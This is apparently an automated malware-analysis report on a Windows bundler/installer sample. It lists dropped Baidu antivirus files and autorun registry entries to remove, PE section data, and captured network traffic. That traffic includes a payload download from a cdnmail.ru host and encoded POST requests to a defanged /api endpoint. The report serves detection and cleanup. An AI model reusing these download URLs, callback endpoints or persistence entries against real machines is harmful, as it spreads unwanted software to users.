%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\systemfile.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\monitor_config.dat (559 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\updlog.dll (13 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvtrayplugins\BDKVTrayTipsPlugin.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDKVDownloadProtect_x64.dll (6360 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\GCScriptBind.dll (7345 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\placeholder_tmp (11 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Download\7z.dll (2105 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\DriverManager.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\809.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BaiduHipsBugRpt.exe (19152 bytes)
%Program Files%\Common Files\Baidu\BDDownload\108\dl.dll (14988 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKV.rdb (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\FileMon.dll (21216 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\DllInject.dll (43 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\iexplore.exe.xml (528 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\809.dat (3 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\SearchProtection.rdb (5064 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\tuopan.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\810.dat (3 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\BavScanM.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\KVMainframe_PluginConfig.xml (1 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\drivers\x86\bd0001.sys (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\scan_mgr_config.dat (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BaiduHips.exe (38495 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\ccesign.dat (2105 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Download\bddownloader.exe (9605 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKVQuarantine.rdb (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\KVInstallHelper.dll (16424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\ad.dll (19152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\ccesign.dat (12024 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMAVCached.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\bdmp.dat (1552 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\repairplugins\baidusdRepair.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\WebSafe.dll (33747 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\百度æÂ€毒\å¸载百度æÂ€毒.lnk (880 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMBase.dll (7345 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\fm.dat (597 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMMsg.dll (47 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\Common\Global.db (100 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\white_list.dat (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMMsg.dll (1552 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMEvents.dll (15 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\bd0001.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BaiduSdRepair.exe (16288 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDKVDeskBand64.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvtrayplugins\TrayPluginContainerConfig.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMRepMgr.dll (12088 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMDbSqlite.dll (19592 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\x86\bd0002.sys (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDConfig.dll (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMEvents.dll (15 bytes)
%System%\drivers\bd0002.sys (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMLog.dll (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BaiduSd.exe (12536 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\bd0001.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMReport.dll (1425 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmsysrepair\BSRLib.dat (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\virus_type.dat (1 bytes)
%System%\drivers\bd0001.sys (601 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\smr.dat (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDKVDownloadProtect.dll (5520 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BaiduSdSvc.exe (27704 bytes)
%System%\config\SYSTEM.LOG (4386 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDPerflog.dll (10512 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMScriptVM.dll (7192 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkv\KVMainframePluginContainerConfig.xml (384 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMAVCached.dll (23584 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\tips.xml (1 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdRepair.exe (3073 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\InstallCfg.xml (177 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\cache_config.dat (469 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\KVCommonRes.rdb (131925 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\WebSafe.dll (7547 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\bd0002.sys (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDKVWsc.exe (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\UserDetectionPlugin.dll (5520 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMSRCore.dll (10136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDShellExt.dll (14184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\ToastImage.png (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\placeholder_tmp (11 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\901.dat (8 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\wverify.dat (15019 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDKVRmvDevPlugin.dll (8560 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMDownload.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\DllInject.dll (1552 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsClient.xml (18 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkv\BDKVVirusPlugins.dll (2105 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvtrayplugins\BDKVRmvDevPlugin.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMBase.dll (32128 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdSvc.exe (5873 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\DriverManager.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMAVEng.dll (4545 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvtrayplugins\UserDetectionPlugin.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\WebMonHook.dll (12088 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\drivers\x64\bd0002.sys (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\PullUpConfig.xml (1524 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\KVRtp_PluginConfig.xml (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDDriverFixer.dll (16368 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvrtpplugins\fm.dat (597 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\WebMonBHO.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\systemfile.dat (6 bytes)
%System%\drivers\BDArKit.sys (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMTinyXml.dll (6360 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\duilib license.txt (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\tuopan.png (3 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDKVMainFrame.dll (7433 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMSREng.dll (10136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\bd0001.dll (4992 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMUpdate.dll (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\patch.7z (7433 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmsysrepair\BDMSRCore.dll (1425 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\804.dat (3 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\Database\bdvs.dat (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\HIPSClient.dll (15536 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMReport.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMWindowsLib.dll (3312 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\BavScanS.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDConfig.dll (36536 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BaiduHips.exe (8657 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\bdcomproxy.dll (2392 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDMRepBase.dll (7345 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\vcrt.msi (22552 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\bd0002.dll (3073 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDDriverFixer.dll (1281 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdTray.exe (15116 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMBase.dll (7345 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\blacksign.dat (1704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\KVFixerConfigMgr.dll (8560 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\WebSafePlugin.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\CoolyContainerConfig.xml (329 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BaiduHipsUpdate.exe (37 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvrtpplugins\FileMon.dll (4185 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\blacksign.dat (852 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDKVDownloadProtect.dll (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\licenses\duilib license.txt (1 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMAVEng.dll (4545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\811.dat (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\System.dll (784 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMFrameWork.dll (1425 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\patch\placeholder_tmp (11 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDShellExt.dll (2321 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\BavScanV.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BaiduHipsIU.dll (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\cache_config.dat (938 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BaiduSdTray.exe (66750 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\806.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\GetSupplyId.dll (3616 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMNet.dll (5873 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\dl.dll (14988 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMReport.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\SysFixerLuaScript.dat (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\patch.7z (33536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDDownLoadProtectPlugin.dll (16288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BaiduHipsUpdate.exe (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\KVMainframe_PluginConfig.xml (1 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\hips_product.xml (291 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\systemfile.dat (3 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDDriverFixer.dll (1281 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\user_trusted_list.dat (125 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\putips_wording.dat (580 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\scan_mgr_config.dat (5 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKVConfig.rdb (5064 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\ToastImage.png (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\TrustAndIso.dll (13440 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\KVTray_PluginConfig.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\NetService.ini (1230 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BavFrame.dll (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDKVDeskBand64.dll (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk4.tmp (1287722 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\drivers\bd0003.sys (55 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMAVE.dll (1281 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDPerflog.dll (601 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMLog.dll (43 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDMRepMgr.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\Repair_PluginConfig.xml (411 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMAVEng.dll (46488 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\810.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\smr.dat (1 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDMPerfMon.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BaiduSdBugRpt.exe (23936 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\iexplore.exe.xml (528 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\bd0003.sys (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\DriverManager.dll (8608 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMMsg.dll (47 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\cache_config.dat (469 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\app.ico (2105 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\drivers\x86\bd0002.sys (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\kav_verify.dat (677 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BaiduSdUpdate.exe (33263 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDCooly.dll (3312 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDMAVCached.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\BDMSkin.dll (37727 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDCooly.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDKVDeskBand.dll (5064 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDConfig.dll (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\bddownloader.exe (41699 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\CompatibilityChecker.dll (5520 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\TrayPluginContainerConfig.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BavCommon.dll (8184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\user_trusted_list.dat (125 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDKVWsc.exe (13368 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\DriverManager.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\smr.dat (1 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\KVFixerConfigMgr.dll (1281 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\BavCommon.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\SysFixerXMLScript.dat (2 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\BavEngine.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\licenses\directui license.txt (593 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\wverify.dat (132336 bytes)
%Program Files%\Common Files\Baidu\BDDownload\108\7z.dll (2105 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"MailRuUpdater" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Mail.Ru\MailRuUpdater.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"eTranslator Update" = "%Documents and Settings%\%current user%\Application Data\eTranslator\eTranslator.exe -checkforupdates"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"baidu" = "%Program Files%\baidu\BindEx.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"amigo" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe --no-startup-window" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name: 0.0.0.0
Product Name: 0.0.0.0
Product Version: 0.0.0.0
Legal Copyright: 0.0.0.0
Legal Trademarks: 0.0.0.0
Original Filename: 0.0.0.0
Internal Name: 0.0.0.0
File Version: 0.0.0.0
File Description: 0.0.0.0
Comments: 0.0.0.0
Language: English (United Kingdom)
Company Name: 0.0.0.0Product Name: 0.0.0.0Product Version: 0.0.0.0Legal Copyright: 0.0.0.0Legal Trademarks: 0.0.0.0Original Filename: 0.0.0.0Internal Name: 0.0.0.0File Version: 0.0.0.0File Description: 0.0.0.0Comments: 0.0.0.0Language: English (United Kingdom)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 2491916 | 2492416 | 4.49624 | d3e56176cccc2d63615cc428353cba9f |
.itext | 2498560 | 8388 | 8704 | 4.31856 | fba802c40e1cbe19226783ab161d586f |
.data | 2510848 | 22872 | 23040 | 3.57779 | e4fc7fe9a9187919095376fc2fa022c4 |
.bss | 2535424 | 21852 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.idata | 2560000 | 14876 | 15360 | 3.53207 | bfb7d44dad0bde449282d497c1d61a89 |
.didata | 2576384 | 2518 | 2560 | 2.90164 | b52800be4f3b71638a52a44f0c581100 |
.tls | 2580480 | 80 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rdata | 2584576 | 24 | 512 | 0.143426 | c5b60a955b567dfd021dd069f786560f |
.reloc | 2588672 | 233652 | 233984 | 4.62552 | ef2fda4b19ab5821add6163588b2e787 |
.rsrc | 2826240 | 5306690 | 5306880 | 5.52336 | e2483020b986011e548a2669a8bb829f |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 5
43a57e295389b33940065640d26ca3f2
7269ea0914ebde28fdbb10ed474c075f
625cef4edf44f1688027593d63d5a8b7
58eef55d2cda5ce47a2c8aaeba63dcee
95871415ba84c2b3e96ae89fd7b40b44
Network Activity
URLs
URL | IP |
---|---|
hxxp://7d8elkqrpz9cesw.xn--n1aaaglu5c.xn--p1ai/api | |
hxxp://moscow.cdnmail.ru/AmigoDistrib.exe | |
hxxp://amigobin.cdnmail.ru/AmigoDistrib.exe | 217.69.139.110 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /AmigoDistrib.exe HTTP/1.1
Host: amigobin.cdnmail.ru
Accept: text/html, */*
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 10 Dec 2014 23:55:52 GMT
Content-Type: application/octet-stream
Content-Length: 50381352
Connection: keep-alive
Last-Modified: Wed, 22 Oct 2014 09:47:42 GMT
ETag: "54477d3e-300c228"
Accept-Ranges: bytes
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Vv..................*....`................0.......=.......7.....Rich............................PE..L...I.>T.................6...v......p8.......P....@.........................................................................`?..x....p...t..............(............................................................................................text....4.......6.................. ..`.data... ....P......................@....rsrc....t...p...v...:..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................DD..6D..$D...D..TD......&A..6A..BA..TA..`A..vA...A...A...A...A...A...A...B...B..$B..@B..LB..bB..xB...B...A...B...B...B...B...B...B...C...C..0C..>C..TC..dC..xC...C...C...C...C...C...C...A...@...@...@...B...@.......D..rD.......D...D.......D......................I.>T........[...,...,.......{.8.A.6.9.D.3.4.5.-.D.5.6.4.-.4.6.3.c.-.A.F.F.1.-.A.6.9.D.9.E.5.3.0.F.9.6.}.....{.F.D.A.7.1.E.6.F.-.A.C.4.C.-.4.a.0.0.-.8.B.7.0.-.9.9.5.8.A.6.8.9.0.6.B.F.}.....{.8.B.A.9.8.6.D.A.-.5.1.0.0.-.4.0.5.E.-.A.A.3.5.-.8.6.F
<<< skipped >>>
POST /api HTTP/1.0
Connection: keep-alive
Content-Length: 339
Host: 7d8elkqrpz9cesw.xn--n1aaaglu5c.xn--p1ai
Accept: text/html, */*
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)
....x.eQ.n.0....U.z..5C..@..A.......Zr. ...J...`....Q.\..ZH.:;.....R.....l{.\'5......*....#}..2...g...s.....u..0......y.R.1.e.........~M....T.g..0O?.a..\s^jO..SI.U 0...W..'.FT..?....Hj......W.......b.......N9.............i :...................}\E..1d..d.*...F.....mW..c.(-.r...x)..]i....;%O6f...V..&...[rT.uC.8-.........-..NP.@......o
HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Wed, 10 Dec 2014 23:55:23 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.17
....x..Xmo.8.. Qt[.R.$..T. .....j..~8.".L GH....U...........b.....=...b..4..9..6s.v..I.t.............'?t.<.......(....f.r.a...m;. .A......qa...3...1.O.0.T..,gq....C.. ....&l ..a...4....m...G...%u?H.,..|J.]!.EY..~.....(....J.l.}..a:..I......8.t....n.A..^{...G.w.%.i...h........=.5aP.V.p&...3.O....$..KX..N.g....E.h.r..H.9.r.9...r..KeR..K5[..W..bV.5.E....K.@jiK?..T'}.|.vs....M...........>a...nE..2q..V...w&<.....E..yBv..{y...S.(.!N.....{.Z.E`.S.AV.h..d..*#k..!.6...I..q0.....y..}..d.@<.|.x...x....@Fi.<`...e....&.u.... ..@..........<`p..@..y..|.o..<.F.M..s..R..8-...F..".l.....".*-......"(.3!.[qM..\.....@.....3.@\.0...........<..z).}..x.P.j...s..,O.......s..ZG{.=:..._(...*.uio(i.WRVYi.E...YZ.d..hp.8=5.K=P...[.2.).. ....n8^ .tP.E_e.P<T... 5.Ci*...@.).....U.n.#u....#.....|.S.l.c..{...U..X.J].tv....o..~...?..xVA.A.;...0D...nm.F..d$.j........|.5..J.4.....2..\...x....@.9~.....s.b[........m.-(......l6..R...... ...;.%.1..-.......\..5....]..{<.t.``_.ZJ.. .-.Hs.K?.w^..Z.2.N. ..hw...d.c9.H...f.....\m...YY....'4IK-.bS.c..*..8.B.V...6B.........j...S.i... .......ZAV.......`.. ....5.K...&.U..j.u.won......qV.k..G...<..9...g.JE_...l.Z.. ...n...k...........&[.MR... o..VB.*1.$1..?.....%s........C..}.....~...$.....<.......Pz.....C-.l....w.J........V.{.h...W...N?........
POST /api HTTP/1.0
Connection: keep-alive
Content-Length: 333
Host: 7d8elkqrpz9cesw.xn--n1aaaglu5c.xn--p1ai
Accept: text/html, */*
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)
....x.eQ.n. ...h...m.kN.U..R.... a'..4...].....w....".`B)...V0>Pw......(5.z.O..6.......Vp,f._r.K...X....QJ%.T!....!.CLa....T.R.;B..^j@...K;.!.x^...n.i.........Y.......:..K..;... .A....<...g..._...4.|....=.j......|.v....d.G..eH..8.....q..v.o...&} .(..a..%..).FM%.-6.2.K%..T .tk.O..........jK....:...n`.N..^k.{....Sp.......`.q..?)<.v
HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Wed, 10 Dec 2014 23:55:22 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.17
